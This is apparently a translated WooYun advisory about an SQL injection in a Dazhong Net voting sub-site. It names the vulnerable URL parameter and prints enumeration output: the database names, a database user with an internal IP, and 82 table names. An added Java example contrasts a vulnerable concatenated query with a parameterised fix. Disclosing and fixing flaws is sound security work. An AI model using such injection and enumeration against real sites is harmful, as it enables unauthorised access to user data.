
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-040147

Title: Dazhong Net (大众网) # an SQL injection vulnerability in one of its sub-sites

Affected vendor: Dazhong Net (大众网)

Reported by: 爱上平顶山

Submitted: 2013-10-18 09:19

Fixed: 2013-12-02 09:19

Published: 2013-12-02 09:19

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-10-18: Details sent to the vendor; awaiting vendor response
2013-10-18: Vendor confirmed; details disclosed to the vendor only
2013-10-28: Details disclosed to core white hats and domain experts
2013-11-07: Details disclosed to regular white hats
2013-11-17: Details disclosed to intern white hats
2013-12-02: Details disclosed to the public

Brief description:

0.0

Detailed description:

Dazhong Net (大众网)
Site: http://tp.dzwww.com/zhuanti/sdtyn/index.jsp?group=2
Other items were self-tested.
Information:
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:05:25] [INFO] fetching database names
[09:05:25] [INFO] the SQL query used returns 2 entries
[09:05:25] [INFO] retrieved: information_schema
[09:05:26] [INFO] retrieved: dzvote
available databases [2]:
[*] dzvote
[*] information_schema
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:06:09] [INFO] retrieved: 'dzvote'@'172.19.2.40'
database management system users [1]:
[*] 'dzvote'@'172.19.2.40'
There are quite a lot of tables.



Database: dzvote
[82 tables]
+---------------------------+
| app_child |
| app_child_user |
| app_handle_info |
| app_hh_msg |
| app_hh_phone |
| app_phone |
| app_random |
| app_temp_user |
| app_tydm |
| app_vote_admin |
| app_vote_admin_user |
| app_vote_analysis |
| app_vote_bip |
| app_vote_bl |
| app_vote_blr |
| app_vote_calling |
| app_vote_cooper |
| app_vote_house_user |
| app_vote_hzfx |
| app_vote_idcard |
| app_vote_idcard11 |
| app_vote_indexpic |
| app_vote_info |
| app_vote_info_delete |
| app_vote_info_jndt |
| app_vote_ip |
| app_vote_ip20120528 |
| app_vote_ip20130909 |
| app_vote_ip_load |
| app_vote_ivr |
| app_vote_ivr_temp |
| app_vote_ivr_temp20120601 |
| app_vote_ivr_temp20121119 |
| app_vote_ivr_temp20130114 |
| app_vote_jnsdqn |
| app_vote_koupiao |
| app_vote_log |
| app_vote_logo |
| app_vote_lottery |
| app_vote_mac |
| app_vote_message |
| app_vote_mlcz |
| app_vote_name |
| app_vote_news |
| app_vote_obj |
| app_vote_orders |
| app_vote_other_temp |
| app_vote_partner |
| app_vote_phone |
| app_vote_seidcard |
| app_vote_sign |
| app_vote_skin |
| app_vote_sms |
| app_vote_sms_limit |
| app_vote_sms_temp |
| app_vote_sms_temp20111109 |
| app_vote_sms_temp20120601 |
| app_vote_sms_temp20121119 |
| app_vote_sms_temp20130114 |
| app_vote_subject |
| app_vote_subject_news |
| app_vote_template |
| app_vote_tuopiao |
| app_vote_tuopiao_old |
| app_vote_use_temp |
| app_vote_user |
| app_vote_user_test |
| app_vote_wall |
| app_vote_web |
| app_vote_web_limit |
| app_vote_web_temp |
| app_vote_web_temp20120813 |
| app_vote_web_temp20120820 |
| app_vote_web_temp20121012 |
| app_vote_web_temp20130828 |
| app_vote_web_temp20130909 |
| app_vote_web_temp20130928 |
| app_vote_web_temp_load |
| app_vote_webconfig |
| tChkDBCon |
| tchkdbcon |
| zcr_phone |
+---------------------------+
ok

Proof of vulnerability:


Fix recommendation:

Filtering.
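The report's fix advice is the single word "filtering". As an added example, not code from the report or from the vendor, the following Java/JDBC snippet shows what that means for the `group` parameter of the affected JSP page: the vulnerable concatenation pattern beside a hardened version that validates the value as an integer and binds it with a `PreparedStatement`. The table and column names (`vote_subject`, `group_id`, `id`, `title`) are placeholders; the real schema is not given in the report.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class VoteGroupDao {

    // Vulnerable pattern (illustrative): the raw request parameter is pasted
    // into the SQL text, so a crafted "group" value rewrites the query.
    static String vulnerableQuery(String groupParam) {
        return "SELECT id, title FROM vote_subject WHERE group_id = " + groupParam;
    }

    // Hardened, step 1: the parameter is only ever a small non-negative integer,
    // so reject anything else before it reaches the database layer.
    static int parseGroup(String groupParam) {
        if (groupParam == null || !groupParam.matches("\\d{1,6}")) {
            throw new IllegalArgumentException("invalid group parameter");
        }
        return Integer.parseInt(groupParam);
    }

    // Hardened, step 2: the SQL text is a constant and the value is bound as a
    // typed parameter, so it can never be interpreted as part of the statement.
    // Table/column names are placeholders (assumed, not from the report).
    static List<String> loadSubjects(Connection conn, String groupParam) throws SQLException {
        int groupId = parseGroup(groupParam);
        String sql = "SELECT id, title FROM vote_subject WHERE group_id = ?";
        List<String> titles = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, groupId);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    titles.add(rs.getString("title"));
                }
            }
        }
        return titles;
    }
}
```

Binding alone closes the injection; the integer check in addition gives the application a clear place to log and reject malformed requests, which is where detection of probing against this endpoint would start.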

Copyright notice: when reposting, please credit the source: 爱上平顶山@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-10-18 10:48

Vendor reply:

The problem has been confirmed; thanks to 山山 for providing the information. Working hard on fixing it by every means.

Latest status:

None yet